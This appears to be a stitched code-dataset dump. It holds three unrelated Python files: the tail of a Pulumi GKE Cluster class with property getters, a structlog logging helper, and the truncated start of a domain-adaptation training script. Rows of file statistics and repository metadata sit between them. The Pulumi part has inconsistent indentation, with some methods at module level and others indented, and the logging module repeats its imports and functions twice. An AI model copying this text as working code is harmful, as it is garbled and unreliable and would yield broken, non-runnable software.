        enable_binary_authorization=enable_binary_authorization,
        enable_intranode_visibility=enable_intranode_visibility,
        enable_kubernetes_alpha=enable_kubernetes_alpha,
        enable_l4_ilb_subsetting=enable_l4_ilb_subsetting,
        enable_legacy_abac=enable_legacy_abac,
        enable_shielded_nodes=enable_shielded_nodes,
        enable_tpu=enable_tpu,
        endpoint=endpoint,
        identity_service_config=identity_service_config,
        initial_node_count=initial_node_count,
        ip_allocation_policy=ip_allocation_policy,
        label_fingerprint=label_fingerprint,
        location=location,
        logging_config=logging_config,
        logging_service=logging_service,
        maintenance_policy=maintenance_policy,
        master_auth=master_auth,
        master_authorized_networks_config=master_authorized_networks_config,
        master_version=master_version,
        min_master_version=min_master_version,
        monitoring_config=monitoring_config,
        monitoring_service=monitoring_service,
        name=name,
        network=network,
        network_policy=network_policy,
        networking_mode=networking_mode,
        node_config=node_config,
        node_locations=node_locations,
        node_pools=node_pools,
        node_version=node_version,
        notification_config=notification_config,
        operation=operation,
        pod_security_policy_config=pod_security_policy_config,
        private_cluster_config=private_cluster_config,
        private_ipv6_google_access=private_ipv6_google_access,
        project=project,
        release_channel=release_channel,
        remove_default_node_pool=remove_default_node_pool,
        resource_labels=resource_labels,
        resource_usage_export_config=resource_usage_export_config,
        self_link=self_link,
        services_ipv4_cidr=services_ipv4_cidr,
        subnetwork=subnetwork,
        tpu_ipv4_cidr_block=tpu_ipv4_cidr_block,
        vertical_pod_autoscaling=vertical_pod_autoscaling,
        workload_identity_config=workload_identity_config,
    )
    return Cluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="addonsConfig")
def addons_config(self) -> pulumi.Output['outputs.ClusterAddonsConfig']:
    """
    The configuration for addons supported by GKE.
    Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "addons_config")
@property
@pulumi.getter(name="authenticatorGroupsConfig")
def authenticator_groups_config(self) -> pulumi.Output['outputs.ClusterAuthenticatorGroupsConfig']:
    """
    Configuration for the
    [Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
    Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "authenticator_groups_config")
@property
@pulumi.getter(name="clusterAutoscaling")
def cluster_autoscaling(self) -> pulumi.Output['outputs.ClusterClusterAutoscaling']:
    """
    Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
    automatically adjust the size of the cluster and create/delete node pools based
    on the current needs of the cluster's workload. See the
    [guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
    for more details. Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "cluster_autoscaling")
@property
@pulumi.getter(name="clusterIpv4Cidr")
def cluster_ipv4_cidr(self) -> pulumi.Output[str]:
    """
    The IP address range of the Kubernetes pods
    in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
    automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
    only work for routes-based clusters, where `ip_allocation_policy` is not defined.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "cluster_ipv4_cidr")
@property
@pulumi.getter(name="clusterTelemetry")
def cluster_telemetry(self) -> pulumi.Output['outputs.ClusterClusterTelemetry']:
    """
    Configuration for the
    [ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature.
    Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "cluster_telemetry")
@property
@pulumi.getter(name="confidentialNodes")
def confidential_nodes(self) -> pulumi.Output['outputs.ClusterConfidentialNodes']:
    """
    Configuration for the [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature.
    Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "confidential_nodes")
@property
@pulumi.getter(name="databaseEncryption")
def database_encryption(self) -> pulumi.Output['outputs.ClusterDatabaseEncryption']:
    """
    Application-layer secrets (database) encryption settings for the cluster.
    Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "database_encryption")
@property
@pulumi.getter(name="datapathProvider")
def datapath_provider(self) -> pulumi.Output[str]:
    """
    The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "datapath_provider")
@property
@pulumi.getter(name="defaultMaxPodsPerNode")
def default_max_pods_per_node(self) -> pulumi.Output[int]:
    """
    The default maximum number of pods
    per node in this cluster. This doesn't work on "routes-based" clusters, clusters
    that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
    for more information.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "default_max_pods_per_node")
@property
@pulumi.getter(name="defaultSnatStatus")
def default_snat_status(self) -> pulumi.Output['outputs.ClusterDefaultSnatStatus']:
    """
    [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "default_snat_status")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
    """
    Description of the cluster.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "description")
@property
@pulumi.getter(name="dnsConfig")
def dns_config(self) -> pulumi.Output[Optional['outputs.ClusterDnsConfig']]:
    """
    Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "dns_config")
@property
@pulumi.getter(name="enableAutopilot")
def enable_autopilot(self) -> pulumi.Output[Optional[bool]]:
    """
    Enable Autopilot for this cluster. Defaults to `false`.
    Note that when this option is enabled, certain features of Standard GKE are not available.
    See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
    for available features.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_autopilot")
@property
@pulumi.getter(name="enableBinaryAuthorization")
def enable_binary_authorization(self) -> pulumi.Output[Optional[bool]]:
    """
    Enable Binary Authorization for this cluster.
    If enabled, all container images will be validated by Google Binary Authorization.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_binary_authorization")
@property
@pulumi.getter(name="enableIntranodeVisibility")
def enable_intranode_visibility(self) -> pulumi.Output[bool]:
    """
    Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_intranode_visibility")
@property
@pulumi.getter(name="enableKubernetesAlpha")
def enable_kubernetes_alpha(self) -> pulumi.Output[Optional[bool]]:
    """
    Whether to enable Kubernetes Alpha features for
    this cluster. Note that when this option is enabled, the cluster cannot be upgraded
    and will be automatically deleted after 30 days.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_kubernetes_alpha")
@property
@pulumi.getter(name="enableL4IlbSubsetting")
def enable_l4_ilb_subsetting(self) -> pulumi.Output[Optional[bool]]:
    """
    Whether L4ILB Subsetting is enabled for this cluster.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_l4_ilb_subsetting")
@property
@pulumi.getter(name="enableLegacyAbac")
def enable_legacy_abac(self) -> pulumi.Output[Optional[bool]]:
    """
    Whether the ABAC authorizer is enabled for this cluster.
    When enabled, identities in the system, including service accounts, nodes, and controllers,
    will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
    Defaults to `false`.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_legacy_abac")
@property
@pulumi.getter(name="enableShieldedNodes")
def enable_shielded_nodes(self) -> pulumi.Output[Optional[bool]]:
    """
    Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_shielded_nodes")
@property
@pulumi.getter(name="enableTpu")
def enable_tpu(self) -> pulumi.Output[Optional[bool]]:
    """
    Whether to enable Cloud TPU resources in this cluster.
    See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "enable_tpu")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
    """
    The IP address of this cluster's Kubernetes master.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="identityServiceConfig")
def identity_service_config(self) -> pulumi.Output['outputs.ClusterIdentityServiceConfig']:
    """
    Identity Service configuration for the cluster. Structure is documented below.
    """
    # Read-only accessor: delegates to the Pulumi runtime's property store.
    return pulumi.get(self, "identity_service_config")
    @property
    @pulumi.getter(name="initialNodeCount")
    def initial_node_count(self) -> pulumi.Output[Optional[int]]:
        """
        The number of nodes to create in this cluster's default node pool.
        In regional or multi-zonal clusters, this is the number of nodes per zone.
        Must be set if `node_pool` is not set. If you're using `container.NodePool`
        objects with no default node pool, you'll need to set this to a value of
        at least `1`, alongside setting `remove_default_node_pool` to `true`.
        """
        return pulumi.get(self, "initial_node_count")
    @property
    @pulumi.getter(name="ipAllocationPolicy")
    def ip_allocation_policy(self) -> pulumi.Output['outputs.ClusterIpAllocationPolicy']:
        """
        Configuration of cluster IP allocation for VPC-native clusters. Adding this
        block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
        making the cluster VPC-native instead of routes-based.
        Structure is documented below.
        """
        return pulumi.get(self, "ip_allocation_policy")
    @property
    @pulumi.getter(name="labelFingerprint")
    def label_fingerprint(self) -> pulumi.Output[str]:
        """
        The fingerprint of the set of labels applied to this cluster.
        """
        return pulumi.get(self, "label_fingerprint")
    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        The location (region or zone) in which the cluster
        master will be created, as well as the default node location. If you specify a
        zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
        single cluster master. If you specify a region (such as `us-west1`), the
        cluster will be a regional cluster with multiple masters spread across zones in
        the region, and with default node locations in those zones as well.
        """
        return pulumi.get(self, "location")
    @property
    @pulumi.getter(name="loggingConfig")
    def logging_config(self) -> pulumi.Output['outputs.ClusterLoggingConfig']:
        """
        Logging configuration for the cluster. Structure is documented below.
        """
        return pulumi.get(self, "logging_config")
    @property
    @pulumi.getter(name="loggingService")
    def logging_service(self) -> pulumi.Output[str]:
        """
        The logging service that the cluster should write logs to. Available options
        include `logging.googleapis.com` (Legacy Stackdriver),
        `logging.googleapis.com/kubernetes` (Stackdriver Kubernetes Engine Logging),
        and `none`. Defaults to `logging.googleapis.com/kubernetes`.
        """
        return pulumi.get(self, "logging_service")
    @property
    @pulumi.getter(name="maintenancePolicy")
    def maintenance_policy(self) -> pulumi.Output[Optional['outputs.ClusterMaintenancePolicy']]:
        """
        The maintenance policy to use for the cluster. Structure is documented below.
        """
        return pulumi.get(self, "maintenance_policy")
    @property
    @pulumi.getter(name="masterAuth")
    def master_auth(self) -> pulumi.Output['outputs.ClusterMasterAuth']:
        """
        The authentication information for accessing the Kubernetes master.
        Some values in this block are only returned by the API if your service
        account has permission to get credentials for your GKE cluster. If you
        see an unexpected diff unsetting your client cert, ensure you have the
        `container.clusters.getCredentials` permission.
        Structure is documented below.
        """
        return pulumi.get(self, "master_auth")
    @property
    @pulumi.getter(name="masterAuthorizedNetworksConfig")
    def master_authorized_networks_config(self) -> pulumi.Output[Optional['outputs.ClusterMasterAuthorizedNetworksConfig']]:
        """
        The desired configuration options for master authorized networks. Omit the
        nested `cidr_blocks` attribute to disallow external access (except the
        cluster node IPs, which GKE automatically whitelists).
        Structure is documented below.
        """
        return pulumi.get(self, "master_authorized_networks_config")
    @property
    @pulumi.getter(name="masterVersion")
    def master_version(self) -> pulumi.Output[str]:
        """
        The current version of the master in the cluster. This may differ from the
        `min_master_version` set in the config if the master has been updated by GKE.
        """
        return pulumi.get(self, "master_version")
    @property
    @pulumi.getter(name="minMasterVersion")
    def min_master_version(self) -> pulumi.Output[Optional[str]]:
        """
        The minimum version of the master. GKE
        will auto-update the master to new versions, so this does not guarantee the
        current master version--use the read-only `master_version` field to obtain that.
        If unset, the cluster's version will be set by GKE to the version of the most recent
        official release (which is not necessarily the latest version). Most users will find
        the `container.get_engine_versions` data source useful - it indicates which versions
        are available. If you intend to specify versions manually,
        [the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
        describe the various acceptable formats for this field.
        """
        return pulumi.get(self, "min_master_version")
    @property
    @pulumi.getter(name="monitoringConfig")
    def monitoring_config(self) -> pulumi.Output['outputs.ClusterMonitoringConfig']:
        """
        Monitoring configuration for the cluster. Structure is documented below.
        """
        return pulumi.get(self, "monitoring_config")
    @property
    @pulumi.getter(name="monitoringService")
    def monitoring_service(self) -> pulumi.Output[str]:
        """
        The monitoring service that the cluster should write metrics to.
        Automatically send metrics from pods in the cluster to the Google Cloud
        Monitoring API. VM metrics will be collected by Google Compute Engine
        regardless of this setting. Available options include
        `monitoring.googleapis.com` (Legacy Stackdriver),
        `monitoring.googleapis.com/kubernetes` (Stackdriver Kubernetes Engine
        Monitoring), and `none`. Defaults to `monitoring.googleapis.com/kubernetes`.
        """
        return pulumi.get(self, "monitoring_service")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the cluster, unique within the project and location.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def network(self) -> pulumi.Output[Optional[str]]:
        """
        The name or self_link of the Google Compute Engine network to which the
        cluster is connected. For Shared VPC, set this to the self link of the
        shared network.
        """
        return pulumi.get(self, "network")
    @property
    @pulumi.getter(name="networkPolicy")
    def network_policy(self) -> pulumi.Output['outputs.ClusterNetworkPolicy']:
        """
        Configuration options for the
        [NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
        feature. Structure is documented below.
        """
        return pulumi.get(self, "network_policy")
    @property
    @pulumi.getter(name="networkingMode")
    def networking_mode(self) -> pulumi.Output[str]:
        """
        Determines whether alias IPs or routes will be used for pod IPs in the cluster.
        Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables
        [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases)
        and requires the `ip_allocation_policy` block to be defined. By default, when
        this field is unspecified, GKE will create a `ROUTES`-based cluster.
        """
        return pulumi.get(self, "networking_mode")
    @property
    @pulumi.getter(name="nodeConfig")
    def node_config(self) -> pulumi.Output['outputs.ClusterNodeConfig']:
        """
        Parameters used in creating the default node pool.
        Generally, this field should not be used at the same time as a
        `container.NodePool` or a `node_pool` block; this configuration
        manages the default node pool, which isn't recommended to be used.
        Structure is documented below.
        """
        return pulumi.get(self, "node_config")
    @property
    @pulumi.getter(name="nodeLocations")
    def node_locations(self) -> pulumi.Output[Sequence[str]]:
        """
        The list of zones in which the cluster's nodes are located. Nodes must be
        in the region of their regional cluster or in the same region as their
        cluster's zone for zonal clusters. If this is specified for a zonal
        cluster, omit the cluster's zone.
        """
        return pulumi.get(self, "node_locations")
    @property
    @pulumi.getter(name="nodePools")
    def node_pools(self) -> pulumi.Output[Sequence['outputs.ClusterNodePool']]:
        """
        List of node pools associated with this cluster.
        See container.NodePool for schema.
        **Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
        cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
        to say "these are the _only_ node pools associated with this cluster", use the
        container.NodePool resource instead of this property.
        """
        return pulumi.get(self, "node_pools")
    @property
    @pulumi.getter(name="nodeVersion")
    def node_version(self) -> pulumi.Output[str]:
        """
        The Kubernetes version on the nodes. Must either be unset
        or set to the same value as `min_master_version` on create. Defaults to the default
        version set by GKE, which is not necessarily the latest version. This only affects
        nodes in the default node pool. While a fuzzy version can be specified, it's
        recommended that you specify explicit versions as the provider will see spurious diffs
        when fuzzy versions are used. See the `container.get_engine_versions` data source's
        `version_prefix` field to approximate fuzzy versions.
        To update nodes in other node pools, use the `version` attribute on the node pool.
        """
        return pulumi.get(self, "node_version")
    @property
    @pulumi.getter(name="notificationConfig")
    def notification_config(self) -> pulumi.Output['outputs.ClusterNotificationConfig']:
        """
        Configuration for the
        [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications)
        feature. Structure is documented below.
        """
        return pulumi.get(self, "notification_config")
    @property
    @pulumi.getter
    def operation(self) -> pulumi.Output[str]:
        # NOTE(review): undocumented output in the upstream schema; presumably
        # the identifier of the cluster's most recent server-side operation —
        # confirm against the GKE API before documenting it as such.
        return pulumi.get(self, "operation")
    @property
    @pulumi.getter(name="podSecurityPolicyConfig")
    def pod_security_policy_config(self) -> pulumi.Output[Optional['outputs.ClusterPodSecurityPolicyConfig']]:
        """
        Configuration for the
        [PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
        Structure is documented below.
        """
        return pulumi.get(self, "pod_security_policy_config")
    @property
    @pulumi.getter(name="privateClusterConfig")
    def private_cluster_config(self) -> pulumi.Output['outputs.ClusterPrivateClusterConfig']:
        """
        Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
        i.e. clusters with private nodes. Structure is documented below.
        """
        return pulumi.get(self, "private_cluster_config")
    @property
    @pulumi.getter(name="privateIpv6GoogleAccess")
    def private_ipv6_google_access(self) -> pulumi.Output[str]:
        """
        The desired state of IPv6 connectivity to Google Services. By default,
        there is no private IPv6 access to or from Google Services (all access
        will be via IPv4).
        """
        return pulumi.get(self, "private_ipv6_google_access")
    @property
    @pulumi.getter
    def project(self) -> pulumi.Output[str]:
        """
        The ID of the project in which the resource belongs. If it is not
        provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @property
    @pulumi.getter(name="releaseChannel")
    def release_channel(self) -> pulumi.Output['outputs.ClusterReleaseChannel']:
        """
        Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
        feature, which provides more control over automatic upgrades of your GKE clusters.
        When updating this field, GKE imposes specific version requirements. See
        [Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
        for more details; the `container.get_engine_versions` datasource can provide
        the default version for a channel. Note that removing the `release_channel`
        field from your config will cause the provider to stop managing your cluster's
        release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
        channel. Structure is documented below.
        """
        return pulumi.get(self, "release_channel")
    @property
    @pulumi.getter(name="removeDefaultNodePool")
    def remove_default_node_pool(self) -> pulumi.Output[Optional[bool]]:
        """
        If `true`, deletes the default node pool upon cluster creation. If
        you're using `container.NodePool` resources with no default node pool,
        this should be set to `true`, alongside setting `initial_node_count`
        to at least `1`.
        """
        return pulumi.get(self, "remove_default_node_pool")
    @property
    @pulumi.getter(name="resourceLabels")
    def resource_labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        The GCE resource labels (a map of key/value pairs) to be applied to the
        cluster.
        """
        return pulumi.get(self, "resource_labels")
    @property
    @pulumi.getter(name="resourceUsageExportConfig")
    def resource_usage_export_config(self) -> pulumi.Output[Optional['outputs.ClusterResourceUsageExportConfig']]:
        """
        Configuration for the
        [ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering)
        feature. Structure is documented below.
        """
        return pulumi.get(self, "resource_usage_export_config")
    @property
    @pulumi.getter(name="selfLink")
    def self_link(self) -> pulumi.Output[str]:
        """
        The server-defined URL for this resource.
        """
        return pulumi.get(self, "self_link")
    @property
    @pulumi.getter(name="servicesIpv4Cidr")
    def services_ipv4_cidr(self) -> pulumi.Output[str]:
        """
        The IP address range of the Kubernetes services in this cluster, in
        [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
        notation (e.g. `1.2.3.4/29`). Service addresses are typically put in
        the last `/16` from the container CIDR.
        """
        return pulumi.get(self, "services_ipv4_cidr")
    @property
    @pulumi.getter
    def subnetwork(self) -> pulumi.Output[str]:
        """
        The name or self_link of the Google Compute Engine subnetwork in which
        the cluster's instances are launched.
        """
        return pulumi.get(self, "subnetwork")
    @property
    @pulumi.getter(name="tpuIpv4CidrBlock")
    def tpu_ipv4_cidr_block(self) -> pulumi.Output[str]:
        """
        The IP address range of the Cloud TPUs in this cluster, in
        [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
        notation (e.g. `1.2.3.4/29`).
        """
        return pulumi.get(self, "tpu_ipv4_cidr_block")
    @property
    @pulumi.getter(name="verticalPodAutoscaling")
    def vertical_pod_autoscaling(self) -> pulumi.Output[Optional['outputs.ClusterVerticalPodAutoscaling']]:
        """
        Vertical Pod Autoscaling automatically adjusts the resources of pods
        controlled by it. Structure is documented below.
        """
        return pulumi.get(self, "vertical_pod_autoscaling")
    @property
    @pulumi.getter(name="workloadIdentityConfig")
    def workload_identity_config(self) -> pulumi.Output['outputs.ClusterWorkloadIdentityConfig']:
        """
        Workload Identity allows Kubernetes service accounts to act as a user-managed
        [Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
        Structure is documented below.
        """
        return pulumi.get(self, "workload_identity_config")
| 59.733731
| 461
| 0.695944
| 25,817
| 220,298
| 5.767711
| 0.027075
| 0.056069
| 0.063289
| 0.021692
| 0.980753
| 0.976132
| 0.969457
| 0.968201
| 0.966657
| 0.953548
| 0
| 0.002403
| 0.215939
| 220,298
| 3,687
| 462
| 59.749932
| 0.85968
| 0.485261
| 0
| 0.90688
| 1
| 0
| 0.186991
| 0.114401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170819
| false
| 0.000593
| 0.004152
| 0.001186
| 0.278173
| 0.008897
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4cdba5963a08b3f68d730d6baf1bea38cf7138df
| 2,424
|
py
|
Python
|
Helpseeker_nbdev/logging.py
|
vlaukhin/Helpseeker_nbdev
|
fbb2dd62a162340d3fd3e110721e7d6445011435
|
[
"Apache-2.0"
] | null | null | null |
Helpseeker_nbdev/logging.py
|
vlaukhin/Helpseeker_nbdev
|
fbb2dd62a162340d3fd3e110721e7d6445011435
|
[
"Apache-2.0"
] | null | null | null |
Helpseeker_nbdev/logging.py
|
vlaukhin/Helpseeker_nbdev
|
fbb2dd62a162340d3fd3e110721e7d6445011435
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: logging.ipynb (unless otherwise specified).
# Public API of this module. The nbdev export had each name listed twice
# (once per exporting notebook cell); duplicates are redundant in __all__.
__all__ = ['add_timestamp', 'logging_setup']
# Comes from StatsCanadaCore-checkpoint.ipynb, cell
import datetime
import logging
import sys
from structlog import wrap_logger
from structlog.processors import JSONRenderer
from structlog.stdlib import filter_by_level
def add_timestamp(_, __, event_dict):
    """
    Structlog processor that stamps an event with the current UTC time.

    Args:
        _: logger instance (unused; required by the structlog processor signature).
        __: method name (unused; required by the structlog processor signature).
        event_dict: structlog event_dict being assembled.

    Returns:
        event_dict: the same dict, mutated in place to include a
            timezone-aware UTC "timestamp".
    """
    # datetime.utcnow() returns a *naive* datetime and is deprecated since
    # Python 3.12; use an explicitly timezone-aware UTC timestamp instead.
    event_dict["timestamp"] = datetime.datetime.now(datetime.timezone.utc)
    return event_dict
def logging_setup(log_level='INFO'):
    """
    Build a structlog logger that emits JSON records to stdout.

    Args:
        log_level: logging level name, e.g. 'INFO' or 'WARNING'.

    Returns:
        logger: the wrapped structlog logger, ready for use.
    """
    # Route stdlib logging to stdout; the JSON renderer supplies the structure,
    # so the stdlib format is just the raw message.
    logging.basicConfig(stream=sys.stdout, format="%(message)s", level=log_level)
    processors = [
        filter_by_level,
        add_timestamp,
        JSONRenderer(indent=1, sort_keys=True),
    ]
    return wrap_logger(logging.getLogger(__name__), processors=processors)
# Comes from StatsCanadaCore.ipynb, cell
import datetime
import logging
import sys
from structlog import wrap_logger
from structlog.processors import JSONRenderer
from structlog.stdlib import filter_by_level
def add_timestamp(_, __, event_dict):
    """
    Structlog processor that stamps an event with the current UTC time.

    Args:
        _: logger instance (unused; required by the structlog processor signature).
        __: method name (unused; required by the structlog processor signature).
        event_dict: structlog event_dict being assembled.

    Returns:
        event_dict: the same dict, mutated in place to include a
            timezone-aware UTC "timestamp".
    """
    # datetime.utcnow() returns a *naive* datetime and is deprecated since
    # Python 3.12; use an explicitly timezone-aware UTC timestamp instead.
    event_dict["timestamp"] = datetime.datetime.now(datetime.timezone.utc)
    return event_dict
def logging_setup(log_level='INFO'):
    """
    Build a structlog logger that emits JSON records to stdout.

    Args:
        log_level: logging level name, e.g. 'INFO' or 'WARNING'.

    Returns:
        logger: the wrapped structlog logger, ready for use.
    """
    # Route stdlib logging to stdout; the JSON renderer supplies the structure,
    # so the stdlib format is just the raw message.
    logging.basicConfig(stream=sys.stdout, format="%(message)s", level=log_level)
    processors = [
        filter_by_level,
        add_timestamp,
        JSONRenderer(indent=1, sort_keys=True),
    ]
    return wrap_logger(logging.getLogger(__name__), processors=processors)
| 26.064516
| 87
| 0.685231
| 284
| 2,424
| 5.630282
| 0.25
| 0.078799
| 0.03252
| 0.030019
| 0.889306
| 0.889306
| 0.889306
| 0.889306
| 0.889306
| 0.889306
| 0
| 0.001075
| 0.232673
| 2,424
| 93
| 88
| 26.064516
| 0.858602
| 0.377475
| 0
| 0.878049
| 1
| 0
| 0.072411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.292683
| 0
| 0.487805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4cf4d5b1add65853eb533eeb939c1fb1a710c0bc
| 78,189
|
py
|
Python
|
advent/domain_adaptation/train_UDA.py
|
gritYCDA/boundaryOCDA
|
d93f2d4ad1f41d7ec19ba2a2fc7e98ecce914ccb
|
[
"Apache-2.0"
] | null | null | null |
advent/domain_adaptation/train_UDA.py
|
gritYCDA/boundaryOCDA
|
d93f2d4ad1f41d7ec19ba2a2fc7e98ecce914ccb
|
[
"Apache-2.0"
] | null | null | null |
advent/domain_adaptation/train_UDA.py
|
gritYCDA/boundaryOCDA
|
d93f2d4ad1f41d7ec19ba2a2fc7e98ecce914ccb
|
[
"Apache-2.0"
] | null | null | null |
# --------------------------------------------------------
# Domain adpatation training
# Copyright (c) 2019 valeo.ai
#
# Written by Tuan-Hung Vu
# --------------------------------------------------------
import os
import sys
from pathlib import Path
import os.path as osp
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import torch.optim as optim
from tensorboardX import SummaryWriter
from torch import nn
from torchvision.utils import make_grid, save_image
from tqdm import tqdm
from advent.model.discriminator import get_fc_discriminator
from advent.utils.func import adjust_learning_rate, adjust_learning_rate_discriminator
from advent.utils.func import loss_calc, bce_loss, mse_loss, boundary_loss_func, reg_loss_calc_ign
from advent.utils.loss import entropy_loss
from advent.utils.func import prob_2_entropy
from advent.utils.viz_segmask import colorize_mask
import matplotlib.pyplot as plt
from copy import deepcopy
import random
###########################################################################################
# TODO: Source Only for VGG
def train_vgg(model, trainloader, targetloader, cfg):
    ''' UDA training with advent

    Source-only baseline for a VGG-backbone segmentation network: only the
    supervised segmentation loss on the source domain is optimized. No
    discriminator is built, and `targetloader` is never consumed inside the
    loop (its iterator is created but unused).

    Args:
        model: segmentation network; forward returns (mid_feature, main_logits).
        trainloader: source-domain loader yielding
            (images, labels, _, weather_name, _) batches.
        targetloader: target-domain loader (unused in this routine).
        cfg: experiment config; reads TRAIN.* hyper-parameters, GPU_ID and
            NUM_CLASSES.
    '''
    # Create the model and start the training.
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET  # unused: no target-domain loss here
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMENTATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # interpolate output segmaps back up to the (W, H) input resolution
